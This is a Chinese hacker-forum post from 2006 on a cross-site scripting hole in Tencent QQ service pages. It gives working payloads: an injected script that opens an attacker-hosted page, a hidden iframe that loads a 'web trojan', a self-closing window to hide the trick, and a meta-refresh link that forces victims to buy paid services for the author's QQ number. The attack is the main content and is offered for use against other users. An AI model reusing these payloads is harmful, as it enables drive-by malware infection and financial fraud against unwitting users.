|
中华网络安全联盟 作者:佚名 来源:网络 时间:2006-3-19
这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试
不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站..
这个漏洞也不是我发现的..是我的好友netshow告诉我的..听他说也是经过玄猫指点..所以在这里也要感谢玄猫
..又为我们带来了一经典之作..
具体危害和玄猫写过的一篇"QQ跨站漏洞巧利用强迫他人为你购买QQ秀"差不多..只是这个是用来购买腾讯服务
的...这个危害比那个还要大...如果你的QQ币足够支付的话.
首先我们来看一下这个漏洞.
首先进入
http://my.qq.com/
打开业务列表..随便点个业务把..在"索要留言"里写代码:<script>alert('fhod');</script>
这时候对方QQ会出现系统提示..图1..
这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前
面写一段话....然后后面在写<script>alert('fhod');</script>
然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框.图2
那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了..
不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这
个漏洞..
我简单说下我怎么做的把
测试的时候在留言处写<iframe>进行挂马是行不通的..我写了
<iframe src=http://218.xx.xx.xxx/kz.htmwidth=0 height=0></iframe>
然后查看接受的代码就成了
<td>QQ炫铃服务费用:</td>
</tr>
<tr>
<td>预支付
<input type="text" name="textfield" size="2" maxlength="2"
class="border" value="1" onfocus="javascript:SetFee_give();">
个月,总金额为:<font color="#FF0000">
<input label name="total_fee" size="3"
maxlength="3" style="border:#ffffff 1px solid">Q币</td>
</tr>
<tr><td><font color="#0000FF">您可以修改预支付的
月数。</font></td></tr>
</table>
<table width="330" border="0" cellspacing="5" cellpadding="0">
<tr>
<td style="width: 300px; word-wrap: break-word"><font color="#FF0000">
他的留言:</font>试下这个<iframe src</td>
</tr>
很显然..腾讯给过滤了...
而用
<script>window.open("http://218.xx.xx.2xx/kz1.htm");</script>
就完全可以执行成功....然后我们可以在kz1.htm里写这么一段代码
<iframe src=http://218.xx.xx.xxx/kz.htmwidth=0 height=0></iframe>
<script>window.opener=top; window.close();</script>
上面那个http://218.xx.xx.xxx/kz.htm是我们的网页木马地址/..具体什么马视个人需要而定
<script>window.opener=top; window.close();</script>
打开此页面就即刻关闭窗口..起隐蔽的作用
或者在一个HTM页面写如以下代码
<meta http-equiv="Refresh" content="0; URL=http://paycenter.qq.com/cgi-bin/paypresent.cgi?service_type=club&subtype=1&month=1&uin1=1988415&uin2=1988415&leaveword=123">
上面代码意思是给1988415这个号购买一个月的服务..留言是123
在网上看到的以前老方法..自己试了下出现登陆的页面...可能腾讯已经修改了这个漏洞把..
有兴趣可以试下.
我暂时就研究这么多.这几天累死了....抽空继续研究下..先发出来..大家有兴趣的欢迎继续研究..有了成果记
的与我分享!!
|
